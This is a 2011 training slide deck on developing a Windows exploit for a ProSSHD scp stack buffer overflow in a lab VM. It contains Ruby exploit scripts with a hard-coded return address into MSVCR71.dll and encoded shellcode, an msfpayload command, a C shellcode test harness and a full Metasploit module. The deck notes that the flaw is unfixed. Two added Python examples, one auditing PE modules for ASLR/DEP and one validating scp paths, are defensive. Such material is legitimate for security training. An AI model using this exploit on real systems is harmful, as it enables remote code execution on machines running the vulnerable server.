2011-03 Developing Windows Exploits
by Allen Harper, N2NetSecurity, Inc.
Slide 1. Real Windows Exploits
Allen Harper

Slide 2. ProSSHD Vulnerability
Binary can be found at: http://www.exploit-db.com/application/11618
STILL NOT FIXED… 0-days still work…

Slide 3. Install ProSSHD in VMware
•  Set up W7 VMware client, host-only mode.
•  Determine VMware client IP.
•  Ping VMware client from host system.
•  Install Demo ProSSHD inside VM, run it.

Slide 4. Exploit Development Process
•  Crash Program in Debugger
•  Control EIP (next instruction)
•  Determine Offset of Overwrite to EIP
•  Determine Opcode to return to (new EIP)
•  Determine Space Constraints
•  Select and Test Shellcode
•  Build Exploit Sandwich
•  Determine Bad Characters

Slide 5. Immunity Debugger
•  Fork from OllyDbg
•  Still looks and feels like OllyDbg
•  Adds a Python Command Shell
•  Allows for more automation
•  pvefindaddr is a great plugin tool for exploit development! http://corelan.be
•  Note: there was a problem with 1.74
•  Current version is 1.80

Slide 6. Save Snapshot, Attach Debugger
•  In VMware, save snapshot (prior to sending)
•  Send Exploit, with Sleep(15) before send
•  File->Attach->wsshd.exe (may need to sort)
•  In debugger, hit F9 to continue process

Slide 7. Crash the ProSSHD Server
•  From host, crash remote server, control EIP

    # prosshd1.rb
    %w{rubygems net/ssh net/scp}.each { |x| require x }
    username = "test1" # need to set this up on the test victim (os account)
    password = "test1" # need to set this up on the test victim machine
    host = "10.10.10.143"
    port = 22
    # use As to overwrite eip
    get_request = "\x41" * 516
    # lets do it…
    Net::SSH.start(host, username, :password => password) do |ssh|
      sleep(15) # gives us time to attach to wsshd.exe
      ssh.scp.download!(get_request, "foo.txt") # 2 params: remote, local file
    end

•  Run exploit with ruby prosshd1.rb
•  Attach debugger to wsshd.exe, after it loads, hit F9 twice

Slide 8. Determine the Offset(s)
•  Revert VM, then use pattern_create

    # prosshd2.rb
    %w{rubygems net/ssh net/scp}.each { |x| require x }
    username = "test1" # need to set this up on the test victim (os account)
    password = "test1" # need to set this up on the test victim machine
    host = "10.10.10.143"
    port = 22
    # use As to overwrite eip
    get_request = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq"
    # lets do it…
    Net::SSH.start(host, username, :password => password) do |ssh|
      sleep(15) # gives us time to attach to wsshd.exe
      ssh.scp.download!(get_request, "foo.txt") # 2 params: remote, local file
    end

•  Run exploit with ruby prosshd2.rb

Slide 9. Determine the Offset(s)
•  Attach Debugger to wsshd.exe
•  After it loads, hit F9 twice

Slide 10. Determine the Offset(s)

Slide 11. Determine Op-Codes to Return to
•  Determine the Control Vector, we could:
   –  JMP ESP
   –  RETN
•  We choose JMP ESP
•  Could use msfpescan on ntdll.dll

Slide 12. Determine Op-Codes to Return to
•  Problem: Vista and beyond protect NTDLL.DLL with ASLR
•  Need to find a non-ASLR module
•  This is the best way to bypass ASLR
•  pvefindaddr is the tool of choice
•  Run with !pvefindaddr j -r esp -n in ImmDbg
•  Results in file j.txt:
   C:\Users\[your name here]\AppData\Local\VirtualStore\Program Files\Immunity Inc\Immunity Debugger

Slide 13. Determine Op-Code Address

    ==================================================================
    !pvefindaddr v1.32    corelanc0d3r - http://www.corelan.be:8800
    -----Loaded modules ----------------------------------------------
    Fixup | Base       | Top        | Size       | SafeSEH | ASLR | NXCompat | Modulename & Path
    ------------------------------------------------------------------
    NO    | 0x7C340000 | 0x7C396000 | 0x00056000 | yes     | NO   | NO       | MSVCR71.dll : C:\Users\Public\Program Files\Lab-NC\ProSSHD\MSVCR71.dll
    yes   | 0x76210000 | 0x762E4000 | 0x000D4000 | yes     | yes  | yes      | kernel32.dll : C:\Windows\system32\kernel32.dll
    yes   | 0x77A50000 | 0x77B8C000 | 0x0013C000 | yes     | yes  | yes      | ntdll.dll : C:\Windows\SYSTEM32\ntdll.dll
    <truncated for brevity>
    NO    | 0x00400000 | 0x00457000 | 0x00057000 | yes     | NO   | NO       | wsshd.exe : C:\Users\Public\Program Files\Lab-NC\ProSSHD\wsshd.exe
    <truncated for brevity>
    Found push esp - ret at 0x7C345C30 [msvcr71.dll] - [Ascii printable] {PAGE_EXECUTE_READ} [SafeSEH: Yes - ASLR: ** No (Probably not) **] [Fixup: ** NO **] - C:\Users\Public\Program Files\Lab-NC\ProSSHD\MSVCR71.dll
    <truncated for brevity>

Slide 14. Find Space Constraints
•  Crash with 2000 A's, calculate depth of buffer

    # prosshd3.rb
    …truncated for brevity…
    get_request = "\x41" * 492 + "\x42\x42\x42\x42" + "\x41" * 2000

•  Run, Attach, Crash, inspect stack for buffer size:
   0x0012f758 - 0x0012ef88 = 2000
   So we can fit 2000 bytes of shellcode into the buffer!

Slide 15. Select and Test Shellcode
•  Generate your shellcode (switching to C)

    $ msfpayload windows/exec cmd=calc.exe R | msfencode -b '\x00\x0a' -e x86/shikata_ga_nai -t c > sc.txt

•  Take that shellcode and copy-paste into the following harness

    // shellcode.c
    char shellcode[] = // copy paste from above
        "\x31\xc0\x31..."; // your shellcode goes here

    int main() {                 // main function
        int *ret;                // ret pointer for saved ret
        ret = (int *)&ret + 2;   // set ret to point to the saved return
        (*ret) = (int)shellcode; // change the saved ret to addr of shellcode
    }

Slide 16. Select and Test Shellcode
Notice: we disabled DEP (/NXCOMPAT)… does not matter here as our vulnerable program is not linked with /NXCOMPAT by default.
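Slides 12, 13 and 16 hinge on which modules were linked with ASLR and DEP support, and the same two flags are what a defender checks when auditing a deployment for modules that weaken the platform mitigations. The Python below is an added example written for this page, not the deck's code and not pvefindaddr output: it reads the Characteristics field of the COFF header and the DllCharacteristics field of the optional header and reports whether an image opts in to ASLR (IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE, which only helps when relocations were not stripped) and to DEP (IMAGE_DLLCHARACTERISTICS_NX_COMPAT, the /NXCOMPAT link flag). The two images it inspects are constructed header-only blobs, one modelled on the unprotected MSVCR71.dll/wsshd.exe rows of the module table and one on the protected kernel32.dll/ntdll.dll rows; their names are placeholders. SafeSEH is not covered because it lives in the load configuration directory rather than in these header fields.

```python
import struct

# Optional-header DllCharacteristics bits (PE/COFF specification)
DYNAMIC_BASE = 0x0040    # image may be rebased: required for ASLR
NX_COMPAT = 0x0100       # /NXCOMPAT: image opts in to DEP
NO_SEH = 0x0400          # image declares that it uses no SEH handlers
# COFF file-header Characteristics bit
RELOCS_STRIPPED = 0x0001  # no .reloc data, so the loader cannot rebase it


def pe_mitigations(image: bytes) -> dict:
    """Parse the PE headers of an in-memory image and report the
    link-time mitigation flags the Windows loader will honour."""
    if image[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    (_machine, _nsect, _stamp, _symptr, _nsyms, _opt_size,
     characteristics) = struct.unpack_from("<HHIIIHH", image, coff)
    opt = coff + 20  # COFF file header is 20 bytes
    (magic,) = struct.unpack_from("<H", image, opt)
    if magic not in (0x10B, 0x20B):
        raise ValueError("unknown optional header magic 0x%x" % magic)
    # DllCharacteristics sits at offset 70 in both PE32 and PE32+ optional headers
    (dll_chars,) = struct.unpack_from("<H", image, opt + 70)
    relocs_stripped = bool(characteristics & RELOCS_STRIPPED)
    return {
        "pe32plus": magic == 0x20B,
        "aslr": bool(dll_chars & DYNAMIC_BASE) and not relocs_stripped,
        "dep": bool(dll_chars & NX_COMPAT),
        "no_seh": bool(dll_chars & NO_SEH),
        "relocs_stripped": relocs_stripped,
    }


def build_test_image(characteristics: int, dll_characteristics: int) -> bytes:
    """Constructed PE32 header (DOS stub + PE signature + COFF header +
    optional header) with the given flag words. It is a parser fixture,
    not a loadable binary."""
    e_lfanew = 0x40
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    opt_size = 224  # standard PE32 optional header size
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, opt_size, characteristics)
    optional = bytearray(opt_size)
    struct.pack_into("<H", optional, 0, 0x10B)             # PE32 magic
    struct.pack_into("<H", optional, 70, dll_characteristics)
    return bytes(dos) + b"PE\0\0" + coff + bytes(optional)


def audit(name: str, image: bytes) -> list:
    """Print one verdict line and return the list of missing mitigations."""
    flags = pe_mitigations(image)
    missing = [m for m in ("aslr", "dep") if not flags[m]]
    verdict = "OK" if not missing else "WEAK: missing " + ", ".join(missing)
    print(f"{name:16} ASLR={flags['aslr']!s:5} DEP={flags['dep']!s:5} {verdict}")
    return missing


# Constructed samples (placeholder names). 0x0102 = EXECUTABLE_IMAGE | 32BIT_MACHINE.
SAMPLES = {
    "unprotected.dll": build_test_image(0x0102, 0x0000),                     # like MSVCR71.dll / wsshd.exe rows
    "hardened.dll": build_test_image(0x0102, DYNAMIC_BASE | NX_COMPAT),      # like kernel32.dll / ntdll.dll rows
}

if __name__ == "__main__":
    for module_name, blob in SAMPLES.items():
        audit(module_name, blob)
```

To audit a real module, pass `open(path, "rb").read()` to `pe_mitigations`. A module that reports `aslr: False` is exactly what the deck goes looking for on slide 12; on the defensive side it is the module to rebuild with /DYNAMICBASE and /NXCOMPAT, or to replace, since one such module in the process undoes ASLR for the whole address space.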
Slide 17. Build Exploit Sandwich

    # prosshd4.rb
    %w{rubygems net/ssh net/scp}.each { |x| require x }
    username = "test1"
    password = "test1"
    host = "10.10.10.143"
    port = 22
    # [*] x86/shikata_ga_nai succeeded with size 228 (iteration=1)
    shell =
      "\xd9\xcc\x31\xc9\xb1\x33\xd9\x74\x24\xf4\x5b\xba\x99\xe4\x93" +
      "\x62\x31\x53\x18\x03\x53\x18\x83\xc3\x9d\x06\x66\x9e\x75\x4f" +
      "\x89\x5f\x85\x30\x03\xba\xb4\x62\x77\xce\xe4\xb2\xf3\x82\x04" +
      "\x38\x51\x37\x9f\x4c\x7e\x38\x28\xfa\x58\x77\xa9\xca\x64\xdb" +
      "\x69\x4c\x19\x26\xbd\xae\x20\xe9\xb0\xaf\x65\x14\x3a\xfd\x3e" +
      "\x52\xe8\x12\x4a\x26\x30\x12\x9c\x2c\x08\x6c\x99\xf3\xfc\xc6" +
      "\xa0\x23\xac\x5d\xea\xdb\xc7\x3a\xcb\xda\x04\x59\x37\x94\x21" +
      "\xaa\xc3\x27\xe3\xe2\x2c\x16\xcb\xa9\x12\x96\xc6\xb0\x53\x11" +
      "\x38\xc7\xaf\x61\xc5\xd0\x6b\x1b\x11\x54\x6e\xbb\xd2\xce\x4a" +
      "\x3d\x37\x88\x19\x31\xfc\xde\x46\x56\x03\x32\xfd\x62\x88\xb5" +
      "\xd2\xe2\xca\x91\xf6\xaf\x89\xb8\xaf\x15\x7c\xc4\xb0\xf2\x21" +
      "\x60\xba\x11\x36\x12\xe1\x7f\xc9\x96\x9f\x39\xc9\xa8\x9f\x69" +
      "\xa1\x99\x14\xe6\xb6\x25\xff\x42\x48\x6c\xa2\xe3\xc0\x29\x36" +
      "\xb6\x8d\xc9\xec\xf5\xab\x49\x05\x86\x48\x51\x6c\x83\x15\xd5" +
      "\x9c\xf9\x06\xb0\xa2\xae\x27\x91\xc0\x31\xbb\x79\x29\xd7\x3b" +
      "\x1b\x35\x1d"
    # Overwrite eip with jmp esp (0x7c345c30) of msvcr71.dll
    get_request = "\x41" * 492 + "\x30\x5C\x34\x7C" + "\x90" * 1000 + "\xcc" + shell
    # lets do it...
    Net::SSH.start(host, username, :password => password) do |ssh|
      sleep(15) # gives us time to attach to wsshd.exe
      ssh.scp.download!(get_request, "foo.txt") # 2 params: remote file, local file
    end

Slide 18. Test Exploit with Debugger
•  Run with ruby prosshd4.rb
•  Hit F9 twice to hit breakpoint
•  Hit F9 to Continue; if crash, then bad character.

Slide 19. Find Bad Characters
•  Revert VM, resend exploit, step through
•  Tip 1: right click on halted instruction, follow in dump…
•  Shellcode is mangled… why? badchar \x0a

Slide 20. Build new Shellcode

    # msfpayload windows/exec cmd=calc.exe R | msfencode -b '\x00\x0a\x20' -e x86/shikata_ga_nai -t ruby
    # [*] x86/shikata_ga_nai succeeded with size 228 (iteration=1)
    shell =
      "\x33\xc9\xb1\x33\xbd\xe3\x34\x37\xfb\xdb\xc6\xd9\x74\x24" +
      "\xf4\x5f\x31\x6f\x0f\x83\xef\xfc\x03\x6f\xe8\xd6\xc2\x07" +
      "\x06\x9f\x2d\xf8\xd6\xc0\xa4\x1d\xe7\xd2\xd3\x56\x55\xe3" +
      "\x90\x3b\x55\x88\xf5\xaf\xee\xfc\xd1\xc0\x47\x4a\x04\xee" +
      "\x58\x7a\x88\xbc\x9a\x1c\x74\xbf\xce\xfe\x45\x70\x03\xfe" +
      "\x82\x6d\xeb\x52\x5a\xf9\x59\x43\xef\xbf\x61\x62\x3f\xb4" +
      "\xd9\x1c\x3a\x0b\xad\x96\x45\x5c\x1d\xac\x0e\x44\x16\xea" +
      "\xae\x75\xfb\xe8\x93\x3c\x70\xda\x60\xbf\x50\x12\x88\xf1" +
      "\x9c\xf9\xb7\x3d\x11\x03\xff\xfa\xc9\x76\x0b\xf9\x74\x81" +
      "\xc8\x83\xa2\x04\xcd\x24\x21\xbe\x35\xd4\xe6\x59\xbd\xda" +
      "\x43\x2d\x99\xfe\x52\xe2\x91\xfb\xdf\x05\x76\x8a\x9b\x21" +
      "\x52\xd6\x78\x4b\xc3\xb2\x2f\x74\x13\x1a\x90\xd0\x5f\x89" +
      "\xc5\x63\x02\xc4\x18\xe1\x38\xa1\x1a\xf9\x42\x82\x72\xc8" +
      "\xc9\x4d\x05\xd5\x1b\x2a\xf9\x9f\x06\x1b\x91\x79\xd3\x19" +
      "\xfc\x79\x09\x5d\xf8\xf9\xb8\x1e\xff\xe2\xc8\x1b\x44\xa5" +
      "\x21\x56\xd5\x40\x46\xc5\xd6\x40\x25\x88\x44\x08\x84\x2f" +
      "\xec\xab\xd8\xa5"

Good list of bad chars: 00 0a 09 20 21

Slide 21. Metasploit Decoders
•  Require space on the stack to decode
•  Modules use the StackAdjustment parameter
•  You may want to add 16 bytes of NOP to the beginning of the payload to be safe.

Slide 22. Success!
•  Revert VM to running state
•  Launch Exploit with new shellcode
•  Remove \xcc, replace with \x90, fire off exploit
•  P0wn3d!!!!! Where do you want to go today!

Slide 23. Automating
•  Metasploit, as you have seen, is an excellent tool for both exploit development and execution.
•  You should look at existing modules; it is the best way to learn techniques.
•  There is no ProSSHD module
•  We will create one and automate our attack!

Slide 24. Metasploit Module Sections
•  Header
•  Initialize Section (bad chars, targets)
•  Exploit Section (guts of sploit, protocol)

Slide 25. Header

    ##
    # $Id: freesshd_key_exchange.rb 9262 2010-05-09 17:45:00Z jduck $
    ##

    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/framework/
    ##

    require 'msf/core'
    %w{rubygems net/ssh net/scp}.each { |x| require x }

    class Metasploit3 < Msf::Exploit::Remote
      Rank = AverageRanking

      include Msf::Exploit::Remote::Tcp

Slide 26. Initialize Section

      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'ProSSHD 1.2.x SCP-GET Buffer Overflow',
          'Description'    => %q{
            This module exploits a simple stack buffer overflow in ProSSHD 1.2.
            This flaw is due to a buffer overflow error when handling a specially
            crafted scp get request from an SSH client.
            **Based on original Exploit by S2 Crew [Hungary]
          },
          'Author'         => 'AAH',
          'License'        => MSF_LICENSE,
          'Version'        => '$Revision: 10000 $',
          'References'     => [],
          'DefaultOptions' => { 'EXITFUNC' => 'process', },
          'Payload'        =>
            {
              'Space'           => 1000,
              'BadChars'        => "\x00\x09\x0a\x20\x21",
              'StackAdjustment' => -3500,
            },
          'Platform'       => 'win',
          'Targets'        => [ [ 'Windows 7', { 'Ret' => 0x7c345c30 } ], ],
          'Privileged'     => true,
          'DisclosureDate' => 'March 3, 2010',
          'DefaultTarget'  => 0))

        register_options([
          OptString.new('USERNAME', [ true, 'The username to authenticate as' ]),
          OptString.new('PASSWORD', [ true, 'The password for the specified username' ]),
          Opt::RPORT(22)
        ], self.class)
      end

Slide 27. Exploit Section

      def exploit
        get_request = "\x41" * 492 +
          [target.ret].pack('V') +
          "\x90" * 1000 +
          payload.encoded # shellcode 8)

        print_status("Trying to connect to #{datastore['RHOST']}...")

        # lets do it...
        Net::SSH.start(datastore['RHOST'], datastore['USERNAME'], :password => datastore['PASSWORD']) do |ssh|
          #sleep(15) # gives us time to attach to wsshd.exe
          print_status("Sending sploit to #{datastore['RHOST']}...")
          ssh.scp.download!(get_request, "foo.txt") # 2 params: remote file, local file
        end
        handler
      end
    end
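Slides 7 and 26-27 describe the bug as a stack buffer overflow that an over-long remote path in an scp get request triggers. The server-side fix is to bound and sanity-check that path before it reaches any fixed-size buffer, and to log what gets rejected so the attempts on slides 7, 8 and 17 show up in monitoring. The Python below is an added example written for this page, not ProSSHD's code and not part of the deck or the Metasploit module: it validates the remote-path argument and produces an audit record for each rejection. It assumes a 260-byte limit (Windows MAX_PATH) and that legitimate paths are printable UTF-8; the request records it triages are constructed, with the 516-byte all-'A' path taken from the deck's prosshd1.rb and the client addresses chosen to match the deck's 10.10.10.x lab network.

```python
from typing import List, Optional, Tuple

MAX_PATH_LEN = 260  # assumed limit for this example (Windows MAX_PATH)


def validate_scp_path(path: bytes, max_len: int = MAX_PATH_LEN) -> Optional[str]:
    """Check the remote-path argument of an scp get request before it is
    used anywhere. Returns None when the path is acceptable, otherwise a
    short reason suitable for a log line."""
    if not path:
        return "empty path"
    # Length first: this is the bound a fixed-size buffer needs before any copy.
    if len(path) > max_len:
        return f"path length {len(path)} exceeds {max_len}"
    # Control bytes (NUL, newline, ESC, DEL ...) have no place in a file name.
    for b in path:
        if b < 0x20 or b == 0x7F:
            return f"control byte 0x{b:02x} in path"
    # Stray high bytes such as 0x90 or 0xcc are not valid UTF-8 on their own,
    # while real non-ASCII file names decode cleanly.
    try:
        path.decode("utf-8")
    except UnicodeDecodeError:
        return "path is not valid UTF-8"
    return None


def log_rejection(client: str, path: bytes, reason: str) -> str:
    """Format one audit record. Only a short hex prefix of the path is kept so
    the log never carries the untrusted bytes verbatim."""
    preview = path[:16].hex()
    return f'SCP_REJECT client={client} len={len(path)} prefix={preview} reason="{reason}"'


def triage_requests(records: List[Tuple[str, bytes]]) -> List[Tuple[str, str]]:
    """Run the validator over (client, path) records; print an audit line for
    each rejection and return the (client, reason) pairs."""
    rejected = []
    for client, path in records:
        reason = validate_scp_path(path)
        if reason is not None:
            print(log_rejection(client, path, reason))
            rejected.append((client, reason))
    return rejected


# Constructed request records: two ordinary downloads from one client and
# three malformed paths from another.
SAMPLE_REQUESTS = [
    ("10.10.10.50", b"foo.txt"),
    ("10.10.10.50", b"reports/r\xc3\xa9sum\xc3\xa9.txt"),   # valid UTF-8, accepted
    ("10.10.10.1", b"A" * 516),                             # the deck's prosshd1.rb request
    ("10.10.10.1", b"foo\x0a.txt"),                         # embedded newline
    ("10.10.10.1", b"\x90" * 8 + b"\xcc"),                  # raw NOP/int3 bytes, not UTF-8
]

if __name__ == "__main__":
    triage_requests(SAMPLE_REQUESTS)
```

The length check is the one that matters for the overflow itself; the byte-class checks are there because a rejected request with a readable reason is far more useful to an incident responder than a crashed wsshd.exe. In a C server the equivalent of the first check is to compare the incoming length against the destination buffer and use a bounded copy (snprintf or strlcpy style) rather than strcpy.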
Slide 28. Setup
•  Next, install the following rubygems
•  Have to run CygShell as Administrator (on older MSF)
•  Right click on it in start menu, select run as Administrator

Slide 29. Run it
•  Restart vulnerable server
•  Run Metasploit Console

Slide 30. Armitage Demo